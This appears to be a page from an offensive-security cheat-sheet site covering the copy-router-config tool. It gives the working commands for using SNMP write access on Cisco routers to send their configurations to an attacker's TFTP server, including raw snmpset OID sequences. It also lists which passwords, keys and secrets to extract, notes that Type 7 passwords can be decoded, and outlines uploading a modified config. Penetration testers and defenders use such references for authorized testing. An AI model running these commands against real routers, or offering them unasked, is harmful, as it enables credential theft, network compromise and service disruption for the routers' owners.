← All cheat sheets

COPY-ROUTER-CONFIG

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

copy-router-config exploits SNMP write access on Cisco routers to
copy the running or startup configuration to a TFTP server. This
allows retrieval of router configs including passwords (type 7
encrypted, easily reversible).

BASIC USAGE#

copy-router-config <target> <tftp_server> <community>
                                 # Copy config via SNMP

PREREQUISITES#

# 1. SNMP write access to target router
# 2. Known write community string (e.g., "private")
# 3. TFTP server running and accessible from router
# 4. Network connectivity between router and TFTP server

SETUP TFTP SERVER#

# Start TFTP server on attacker machine:
atftpd --daemon --port 69 /tmp/tftp
# or
in.tftpd -l -s /tmp/tftp
# or
service tftpd-hpa start

# Create writable directory:
mkdir -p /tmp/tftp
chmod 777 /tmp/tftp
touch /tmp/tftp/router-config
chmod 666 /tmp/tftp/router-config

USAGE#

# Copy running-config to TFTP
copy-router-config <router_ip> <tftp_ip> <community_string>

# Example:
copy-router-config 192.168.1.1 192.168.1.100 private

MANUAL SNMP METHOD#

# Using snmpset to trigger config copy:

# Copy running-config to TFTP:
snmpset -v 2c -c <community> <router> \
  1.3.6.1.4.1.9.9.96.1.1.1.1.2.<random> i 1 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.3.<random> i 4 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.4.<random> i 1 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.5.<random> a <tftp_ip> \
  1.3.6.1.4.1.9.9.96.1.1.1.1.6.<random> s <filename> \
  1.3.6.1.4.1.9.9.96.1.1.1.1.14.<random> i 1

# Using older IOS SNMP OID:
snmpset -v 1 -c <community> <router> \
  .1.3.6.1.4.1.9.2.1.55.<tftp_ip> s <filename>

ANALYZING CONFIGS#

# After downloading config, look for:
# - Enable passwords (type 5 = MD5, type 7 = reversible)
# - Username/password entries
# - SNMP community strings
# - VPN/IPSec pre-shared keys
# - TACACS+/RADIUS secrets
# - Access lists
# - Routing protocol keys
# - Interface configurations
# - VTY line passwords

# Decrypt Cisco Type 7 passwords:
# Use cisco7decode or online decoders
# Type 7 is NOT secure encryption

UPLOAD MODIFIED CONFIG#

# Reverse: upload a modified config to the router
# WARNING: Can disrupt network operations!
# 1. Modify downloaded config
# 2. Place on TFTP server
# 3. Use SNMP to trigger copy from TFTP to running-config

NOTES#

- Requires SNMP write community string
- SNMP v1/v2c sends community strings in cleartext
- Type 7 Cisco passwords are trivially reversible
- Type 5 (MD5) passwords require cracking
- Type 8/9 (PBKDF2/scrypt) are stronger
- Can completely compromise a router
- May disrupt network services if config is modified
- Only for authorized penetration testing
- Mitigate: Use SNMP v3, restrict SNMP access via ACLs